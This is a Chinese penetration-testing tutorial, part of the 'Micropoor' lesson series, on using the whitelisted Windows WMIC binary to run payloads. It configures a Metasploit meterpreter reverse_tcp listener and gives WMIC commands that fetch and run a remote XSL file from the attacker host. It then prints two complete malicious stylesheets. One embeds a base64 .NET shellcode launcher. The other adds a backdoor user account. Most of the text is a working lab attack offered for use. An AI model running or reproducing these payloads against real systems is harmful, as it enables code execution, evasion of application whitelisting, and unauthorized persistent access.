第八十课:基于白名单Wmic执行payload第十季
注:请多喝点热水或者凉白开,可预防肾结石,通风等。

Wmic简介:

WMIC扩展WMI(Windows Management Instrumentation,Windows管理工具),提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前,如果要管理WMI系统,必须使用一些专门的WMI应用,例如SMS,或者使用WMI的脚本编程API,或者使用象CIM Studio之类的工具。如果不熟悉C++之类的编程语言或VBScript之类的脚本语言,或者不掌握WMI名称空间的基本知识,要用WMI管理系统是很困难的。WMIC改变了这种情况。
说明:Wmic.exe所在路径已被系统添加PATH环境变量中,因此,Wmic命令可识别,需注意x86,x64位的Wmic调用。
Windows 2003 默认位置:
1
C:\WINDOWS\system32\wbem\wmic.exe
2
C:\WINDOWS\SysWOW64\wbem\wmic.exe
Copied!
Windows 7 默认位置:
1
C:\Windows\System32\wbem\WMIC.exe
2
C:\Windows\SysWOW64\wbem\WMIC.exe
Copied!
攻击机: 192.168.1.4 Debian 靶机: 192.168.1.119 Windows 2003 192.168.1.5 Windows 7

配置攻击机msf:

1
msf exploit(multi/handler) > show options
2
3
Module options (exploit/multi/handler):
4
5
Name Current Setting Required Description
6
‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐
7
8
Payload options (windows/meterpreter/reverse_tcp):
9
10
Name Current Setting Required Description
11
‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐
12
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, proce ss, none)
13
14
LHOST 192.168.1.4 yes The listen address (an interface may be specified)
15
16
LPORT 53 yes The listen port
17
18
Exploit target:
19
20
Id Name
21
22
‐‐ ‐‐‐‐
23
24
0 Wildcard Target 23
Copied!

靶机执行:

Windows 7:
1
C:\Windows\SysWOW64\wbem\WMIC.exe os get
2
/format:"http://192.168.1.4/Micropoor.xsl"
Copied!
Windows 2003:
1
WMIC.exe os get /format:"http://192.168.1.4/Micropoor_2003.xsl"
Copied!

附录:

Micropoor_Win7.xsl:
1
<?xml version='1.0'?>
2
3
<stylesheet
4
5
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas‐microsoft‐com:xslt"
6
7
xmlns:user="placeholder"
8
9
version="1.0">
10
11
<output method="text"/>
12
13
<ms:script implements‐prefix="user" language="JScript">
14
15
<![CDATA[
16
17
function setversion() {
18
19
}
20
21
function debug(s) {}
22
23
function base64ToStream(b) {
24
25
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
26
27
var length = enc.GetByteCount_2(b);
28
29
var ba = enc.GetBytes_4(b);
30
31
var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
32
33
ba = transform.TransformFinalBlock(ba, 0, length);
34
35
var ms = new ActiveXObject("System.IO.MemoryStream");
36
37
ms.Write(ba, 0, (length / 4) * 3);
38
39
ms.Position = 0;
40
41
return ms;
42
43
}
44
45
var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
46
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
47
"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
48
"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
49
"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
50
"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
51
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
52
"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
53
"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
54
"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
55
"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
56
"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
57
"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
58
"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
59
"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
60
"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
61
"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
62
"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
63
"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
64
"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
65
"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
66
"ZW1ibHkGFwAAAARMb2FkCg8MAAAAABQAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
67
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
68
"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAVC1CXAAAAAAA"+
69
"AAAA4AACIQsBCwAADAAAAAYAAAAAAAAOKgAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+
70
"AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAwCkA"+
71
"AEsAAAAAQAAA0AIAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
72
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
73
"AAAALnRleHQAAAAUCgAAACAAAAAMAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAA0AIAAABA"+
74
"AAAABAAAAA4AAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAASAAAAAAAAAAAA"+
75
"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAPApAAAAAAAASAAAAAIABQBEIgAAfAcAAAMAAAAAAAAA"+
76
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQgIoBAAACgAA"+
77
"KAIAAAYAACoAAAAAAAAA/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH"+
78
"4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiL"+
79
"WCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyYHiej/"+
80
"0LiQAQAAKcRUUGgpgGsA/9VqCmjAqAEEaAIAADWJ5lBQUFBAUEBQaOoP3+D/1ZdqEFZXaJmldGH/"+
81
"1YXAdAr/Tgh17OhnAAAAagBqBFZXaALZyF//1YP4AH42izZqQGgAEAAAVmoAaFikU+X/1ZNTagBW"+
82
"U1doAtnIX//Vg/gAfShYaABAAABqAFBoCy8PMP/VV2h1bk1h/9VeXv8MJA+FcP///+mb////AcMp"+
83
"xnXBw7vwtaJWagBT/9UAAAATMAYAZQAAAAEAABEAIFUBAACNBgAAASXQAwAABCgGAAAKChYGjml+"+
84
"AQAABH4CAAAEKAMAAAYLBhYHbigHAAAKBo5pKAgAAAoAfgkAAAoMFg1+CQAAChMEFhYHEQQWEgMo"+
85
"BAAABgwIFSgFAAAGJisAKkogABAAAIABAAAEH0CAAgAABCpCU0pCAQABAAAAAAAMAAAAdjQuMC4z"+
86
"MDMxOQAAAAAFAGwAAABgAgAAI34AAMwCAABkAwAAI1N0cmluZ3MAAAAAMAYAAAgAAAAjVVMAOAYA"+
87
"ABAAAAAjR1VJRAAAAEgGAAA0AQAAI0Jsb2IAAAAAAAAAAgAAAVfVAjQJAgAAAPolMwAWAAABAAAA"+
88
"DwAAAAQAAAADAAAABgAAAAwAAAALAAAABAAAAAEAAAABAAAAAQAAAAEAAAADAAAAAQAAAAEAAAAB"+
89
"AAAAAQAAAAAACgABAAAAAAAGAEsARAAGAFsBPwEGAHcBPwEGAKYBhgEGAMYBhgEGAPcBRAAGAEEC"+
90
"hgEGAFwCRAAGAJgChgEGAKcCRAAGAK0CRAAGANACRAAGAAID4wIGABQD4wIGAEcDNwMAAAAAAQAA"+
91
"AAAAAQABAAEAEAAhACkABQABAAEAAAAAAPwBAAAFAAMABwATAQAAZgIAACEABAAHABEAXQASABEA"+
92
"aAASABMBhAI+AFAgAAAAAIYYUgAKAAEAwCEAAAAAkQBYAA4AAQAAAAAAgACRIH8AFQABAAAAAACA"+
93
"AJEgjAAdAAUAAAAAAIAAkSCZACgACwAxIgAAAACRGDADDgANAAAAAQCtAAAAAgC5AAAAAwC+AAAA"+
94
"BADPAAAAAQDZAAAAAgDsAAAAAwD4AAAABAAHAQAABQANAQAABgAdAQAAAQAoAQAAAgAwAREAUgAu"+
95
"ACEAUgA0ACkAUgAKAAkAUgAKADkAUgAKAEkAwAJCAGEA1wJKAGkACgNPAGEADwNYAHEAUgBkAHkA"+
96
"UgAKACcAWwA5AC4AEwBpAC4AGwByAGMAKwA5AAgABgCRAAEAVQEAAAQAWwAnAwABBwB/AAEAAAEJ"+
97
"AIwAAQAAAQsAmQABAGggAAADAASAAAAAAAAAAAAAAAAAAAAAAOQBAAAEAAAAAAAAAAAAAAABADsA"+
98
"AAAAAAQAAwAAAAA8TW9kdWxlPgB3bWlfY3NfZGxsX3BheWxvYWQuZGxsAFByb2dyYW0AU2hlbGxD"+
99
"b2RlTGF1bmNoZXIAbXNjb3JsaWIAU3lzdGVtAE9iamVjdAAuY3RvcgBNYWluAE1FTV9DT01NSVQA"+
100
"UEFHRV9FWEVDVVRFX1JFQURXUklURQBWaXJ0dWFsQWxsb2MAQ3JlYXRlVGhyZWFkAFdhaXRGb3JT"+
101
"aW5nbGVPYmplY3QAbHBTdGFydEFkZHIAc2l6ZQBmbEFsbG9jYXRpb25UeXBlAGZsUHJvdGVjdABs"+
102
"cFRocmVhZEF0dHJpYnV0ZXMAZHdTdGFja1NpemUAbHBTdGFydEFkZHJlc3MAcGFyYW0AZHdDcmVh"+
103
"dGlvbkZsYWdzAGxwVGhyZWFkSWQAaEhhbmRsZQBkd01pbGxpc2Vjb25kcwBTeXN0ZW0uU2VjdXJp"+
104
"dHkuUGVybWlzc2lvbnMAU2VjdXJpdHlQZXJtaXNzaW9uQXR0cmlidXRlAFNlY3VyaXR5QWN0aW9u"+
105
"AFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0"+
106
"dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQB3bWlfY3NfZGxsX3BheWxvYWQA"+
107
"Qnl0ZQA8UHJpdmF0ZUltcGxlbWVudGF0aW9uRGV0YWlscz57MEQxQTVERjAtRDZCNy00RUUzLUJB"+
108
"QzItOTY0MUUyREJCMDNFfQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBWYWx1ZVR5cGUAX19T"+
109
"dGF0aWNBcnJheUluaXRUeXBlU2l6ZT0zNDEAJCRtZXRob2QweDYwMDAwMDItMQBSdW50aW1lSGVs"+
110
"cGVycwBBcnJheQBSdW50aW1lRmllbGRIYW5kbGUASW5pdGlhbGl6ZUFycmF5AEludFB0cgBvcF9F"+
111
"eHBsaWNpdABTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMATWFyc2hhbABDb3B5AFplcm8A"+
112
"RGxsSW1wb3J0QXR0cmlidXRlAGtlcm5lbDMyAC5jY3RvcgBTeXN0ZW0uU2VjdXJpdHkAVW52ZXJp"+
113
"ZmlhYmxlQ29kZUF0dHJpYnV0ZQAAAAAAAyAAAAAAAPBdGg231uNOusKWQeLbsD4ACLd6XFYZNOCJ"+
114
"AyAAAQMAAAECBgkHAAQJCQkJCQoABhgJCQkYCRAJBQACCRgJBSABARENBCABAQgEAQAAAAMGERAH"+
115
"AAIBEikRLQQAARgKCAAEAR0FCBgIAgYYCAcFHQUJGAkYBCABAQ4IAQAIAAAAAAAeAQABAFQCFldy"+
116
"YXBOb25FeGNlcHRpb25UaHJvd3MBgJ4uAYCEU3lzdGVtLlNlY3VyaXR5LlBlcm1pc3Npb25zLlNl"+
117
"Y3VyaXR5UGVybWlzc2lvbkF0dHJpYnV0ZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3Vs"+
118
"dHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5FQFUAhBTa2lwVmVy"+
119
"aWZpY2F0aW9uAQAAAOgpAAAAAAAAAAAAAP4pAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADwKQAA"+
120
"AAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACAAEAAAAAAAAAAAAAAAAAAAAAAA"+
121
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
122
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
123
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
124
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
125
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
126
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
127
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
128
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
129
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAAAAAAAAAA"+
130
"AQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhAAAB0AgAAAAAAAAAAAAB0AjQAAABW"+
131
"AFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAAAAAAAAAAAAAAAAAAA"+
132
"PwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAA"+
133
"AAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAE1AEAAAEAUwB0AHIAaQBuAGcA"+
134
"RgBpAGwAZQBJAG4AZgBvAAAAsAEAAAEAMAAwADAAMAAwADQAYgAwAAAALAACAAEARgBpAGwAZQBE"+
135
"AGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAACAAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4A"+
136
"AAAAADAALgAwAC4AMAAuADAAAABQABcAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAHcAbQBp"+
137
"AF8AYwBzAF8AZABsAGwAXwBwAGEAeQBsAG8AYQBkAC4AZABsAGwAAAAAACgAAgABAEwAZQBnAGEA"+
138
"bABDAG8AcAB5AHIAaQBnAGgAdAAAACAAAABYABcAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBu"+
139
"AGEAbQBlAAAAdwBtAGkAXwBjAHMAXwBkAGwAbABfAHAAYQB5AGwAbwBhAGQALgBkAGwAbAAAAAAA"+
140
"NAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAADgACAAB"+
141
"AEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALgAwAAAAAAAAAAAA"+
142
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
143
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
144
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
145
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
146
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
147
"AAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAABA6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
148
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
149
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
150
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
151
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
152
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
153
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
154
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
155
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
156
"AAAAAAAAAAAAAAAAAAAAAAENAAAABAAAAAkXAAAACQYAAAAJFgAAAAYaAAAAJ1N5c3RlbS5SZWZs"+
157
"ZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQgAAAAKCwAA";
158
159
var entry_class = 'ShellCodeLauncher.Program';
160
161
try {
162
163
setversion();
164
165
var stm = base64ToStream(serialized_obj);
166
167
var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
168
169
var al = new ActiveXObject('System.Collections.ArrayList');
170
171
var d = fmt.Deserialize_2(stm);
172
173
al.Add(undefined);
174
175
var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
176
177
} catch (e) {
178
179
debug(e.message);
180
181
}
182
183
]]> </ms:script>
184
185
</stylesheet>
Copied!
Micropoor_2003.xsl:
1
<?xml version='1.0'?>
2
3
<stylesheet
4
5
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas‐microsoft‐com:xslt"
6
7
xmlns:user="placeholder"
8
9
version="1.0">
10
11
<output method="text"/>
12
13
<ms:script implements‐prefix="user" language="JScript">
14
15
<![CDATA[
16
17
var r = new ActiveXObject("WScript.Shell").Run("net user Micropoor Micropoor /add");
18
19
]]> </ms:script>
20
21
</stylesheet>
Copied!
Micropoor